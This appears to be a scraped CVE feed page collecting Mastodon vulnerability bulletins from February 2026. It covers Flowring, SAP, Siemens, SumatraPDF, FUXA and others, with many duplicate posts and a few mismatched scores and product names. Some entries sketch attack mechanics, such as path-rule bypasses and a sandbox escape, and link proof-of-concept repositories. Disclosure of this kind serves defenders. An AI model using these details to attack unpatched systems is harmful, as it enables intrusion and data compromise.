thehackerwire@mastodon.social at 2026-02-10T09:52:31.000Z ##

🔴 CVE-2025-11242 - Critical (9.8)

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2094
(8.8 HIGH)

EPSS: 0.08%

updated 2026-02-10T15:22:54.740000

4 posts

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

thehackerwire@mastodon.social at 2026-02-10T07:30:05.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:04.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:30:05.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:04.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2093
(7.5 HIGH)

EPSS: 0.05%

updated 2026-02-10T15:22:54.740000

1 posts

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

thehackerwire@mastodon.social at 2026-02-10T07:19:43.000Z ##

🟠 CVE-2026-2093 - High (7.5)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0485
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T15:22:54.740000

1 posts

SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker could induce a persistent service disruption, rendering the CMS completely unavailable. Successful exploitation results in a high impact on availability, w

thehackerwire@mastodon.social at 2026-02-10T04:21:21.000Z ##

🟠 CVE-2026-0485 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15310
(7.8 HIGH)

EPSS: 0.02%

updated 2026-02-10T15:22:54.740000

1 posts

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

thehackerwire@mastodon.social at 2026-02-10T00:19:10.000Z ##

🟠 CVE-2025-15310 - High (7.8)

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25890
(8.1 HIGH)

EPSS: 0.03%

updated 2026-02-10T15:22:54.740000

1 posts

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by modifying the request URL. By adding multiple slashes (e.g., //private/) to the path, the authorization check fails to match the rule, while the underlying

thehackerwire@mastodon.social at 2026-02-09T22:26:00.000Z ##

🟠 CVE-2026-25890 - High (8.1)

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25961
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-10T15:22:54.740000

1 posts

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker with any valid TLS certificate (e.g., Let's Encrypt) can intercept the update check request, inject a malicious installer URL, and achieve arbitrary code

1 repos

https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE

thehackerwire@mastodon.social at 2026-02-09T22:18:14.000Z ##

🟠 CVE-2026-25961 - High (7.5)

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker w...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24684
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T15:02:32.033000

2 posts

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. This vulnerability is fixed in 3.22.0.

thehackerwire@mastodon.social at 2026-02-10T15:04:54.000Z ##

🟠 CVE-2026-24684 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:04:54.000Z ##

🟠 CVE-2026-24684 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23720
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:34

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T10:16:59.000Z ##

🟠 CVE-2026-23720 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:16:59.000Z ##

🟠 CVE-2026-23720 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2268
(7.5 HIGH)

EPSS: 0.06%

updated 2026-02-10T12:30:34

2 posts

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater fields, which allows the resolution of `{post_meta:KEY}` merge tags without authorization checks. This makes it possible for unauthenticated attackers to

1 repos

https://github.com/amusedx/CVE-2026-22686

thehackerwire@mastodon.social at 2026-02-10T10:16:49.000Z ##

🟠 CVE-2026-2268 - High (7.5)

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:16:49.000Z ##

🟠 CVE-2026-2268 - High (7.5)

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22923
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:33

2 posts

A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process that could potentially lead to arbitrary code execution.

thehackerwire@mastodon.social at 2026-02-10T10:30:50.000Z ##

🟠 CVE-2026-22923 - High (7.8)

A vulnerability has been identified in NX (All versions &lt; V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:50.000Z ##

🟠 CVE-2026-22923 - High (7.8)

A vulnerability has been identified in NX (All versions &lt; V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25655
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:33

2 posts

A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user. This could allow an attacker to load malicious DLLs, potentially leading to arbitrary code execution with administrative privilege.(ZDI-CAN-28107)

thehackerwire@mastodon.social at 2026-02-10T10:30:30.000Z ##

🟠 CVE-2026-25655 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions &lt; V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:30.000Z ##

🟠 CVE-2026-25655 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions &lt; V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23719
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:38.000Z ##

🟠 CVE-2026-23719 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:38.000Z ##

🟠 CVE-2026-23719 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23718
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:29.000Z ##

🟠 CVE-2026-23718 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:29.000Z ##

🟠 CVE-2026-23718 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23716
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:00:57.000Z ##

🟠 CVE-2026-23716 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:00:57.000Z ##

🟠 CVE-2026-23716 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23715
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:27

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:00:47.000Z ##

🟠 CVE-2026-23715 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:00:47.000Z ##

🟠 CVE-2026-23715 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2095
(9.8 CRITICAL)

EPSS: 0.17%

updated 2026-02-10T09:30:31

3 posts

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

offseq at 2026-02-10T09:00:32.600Z ##

🚨 CVE-2026-2095: CRITICAL auth bypass in all Flowring Agentflow versions. Remote attackers can impersonate any user — no patch available. Restrict access & monitor for abnormal logins. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T07:21:06.000Z ##

🔴 CVE-2026-2095 - Critical (9.8)

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:06.000Z ##

🔴 CVE-2026-2095 - Critical (9.8)

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2096
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-10T09:30:31

5 posts

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

offseq at 2026-02-10T07:30:30.109Z ##

🚨 CRITICAL vuln: CVE-2026-2096 in Flowring Agentflow (all versions). Unauthenticated attackers can read, modify, or delete DB contents due to authentication bypass. No fix yet — restrict access! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T07:29:44.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:29:44.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:42.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:28.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2097
(8.8 HIGH)

EPSS: 0.21%

updated 2026-02-10T09:30:31

4 posts

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

thehackerwire@mastodon.social at 2026-02-10T07:29:54.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:29:54.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:52.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:37.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24322
(7.7 HIGH)

EPSS: 0.03%

updated 2026-02-10T06:30:45

2 posts

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality and does not affect integrity or availability.

thehackerwire@mastodon.social at 2026-02-10T04:21:49.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:20:54.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23689
(7.7 HIGH)

EPSS: 0.07%

updated 2026-02-10T06:30:44

1 posts

Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control parameter. This triggers prolonged loop execution that consumes excessive system resources, potentially rendering the system unavailable. Successful expl

thehackerwire@mastodon.social at 2026-02-10T04:21:12.000Z ##

🟠 CVE-2026-23689 - High (7.7)

Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-11547
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T06:30:40

1 posts

AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.

thehackerwire@mastodon.social at 2026-02-10T06:17:52.000Z ##

🟠 CVE-2025-11547 - High (7.8)

AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0490
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-10T06:30:39

1 posts

SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a high impact on the availability but no impact on the confidentiality and integrity.

thehackerwire@mastodon.social at 2026-02-10T04:22:09.000Z ##

🟠 CVE-2026-0490 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0488
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T06:30:38

3 posts

An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. This leads to a full database compromise with high impact on confidentiality, integrity, and availability.

beyondmachines1 at 2026-02-11T09:01:32.444Z ##

SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws

SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.

**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T09:01:32.000Z ##

SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws

SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.

**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-10T04:21:30.000Z ##

🔴 CVE-2026-0488 - Critical (9.9)

An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25958
(7.7 HIGH)

EPSS: 0.01%

updated 2026-02-10T02:57:34

1 posts

### **Impact** It is possible to make a specially crafted request with a valid API token that leads to privilege escalation. ### Affected Versions: `≥= 0.27.19` ### Mitigation: Upgrade to a patched version: - 1.5.13 and later (regular release) - 1.4.2 (active [LTS release](https://cube.dev/docs/product/administration/distribution#long-term-support)) - 1.0.14 (end-of-life LTS release) ### *

thehackerwire@mastodon.social at 2026-02-09T23:22:53.000Z ##

🟠 CVE-2026-25958 - High (7.7)

Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25939(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-02-10T02:56:59

1 posts

### Summary An authorization bypass vulnerability in the FUXA allows an unauthenticated, remote attacker to create and modify arbitrary schedulers, exposing connected ICS/SCADA environments to follow-on actions. This vulnerability affects FUXA version 1.2.8 through version 1.2.10. This has been patched in FUXA version 1.2.11. ### Impact This affects all deployments, including those with `runtime.

1 repos

https://github.com/mbanyamer/CVE-2026-25939-SCADA-FUXA-Unauthenticated-Remote-Arbitrary

offseq at 2026-02-10T10:30:30.339Z ##

🔔 CVE-2026-25939: CRITICAL auth bypass in frangoteam FUXA (<1.2.11). Unauthenticated attackers can modify schedulers — risking ICS/SCADA disruption. Patch to 1.2.11+ now! radar.offseq.com/threat/cve-20

##

CVE-2026-25881
(9.1 CRITICAL)

EPSS: 0.05%

updated 2026-02-10T02:56:34

1 posts

### Summary A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the `isGlobal` protection flag through array literal intermediaries. When a global prototype reference (e.g., `Map.prototype`, `Set.prototype`) is placed into an array and retrieved, the `isGlobal` taint is stripped, permitting direct prototype mutation from within the sandbox. This re

thehackerwire@mastodon.social at 2026-02-09T22:18:35.000Z ##

🔴 CVE-2026-25881 - Critical (9)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25892
(7.5 HIGH)

EPSS: 0.06%

updated 2026-02-10T02:56:05

1 posts

### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sends signed version info via JavaScript postMessage, which the browser then POSTs to `?script=version`. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST `version[]` parameter which PHP converts to an array. On next page load, `openssl_verify()` receives this array instead

thehackerwire@mastodon.social at 2026-02-09T22:16:42.000Z ##

🟠 CVE-2026-25892 - High (7.5)

Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint la...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15319
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T00:30:37

1 posts

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

thehackerwire@mastodon.social at 2026-02-09T23:23:03.000Z ##

🟠 CVE-2025-15319 - High (7.8)

Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25791
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-09T22:39:51

1 posts

## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when `EnforceOTP` is enabled. Because sessions are stored without a cleanup/expiry path in this flow, an unauthenticated remote actor can repeatedly create sessions and drive memory exhaustion. ## Vulnerable Component - `server/c2/dns.go:84-90

thehackerwire@mastodon.social at 2026-02-09T21:19:58.000Z ##

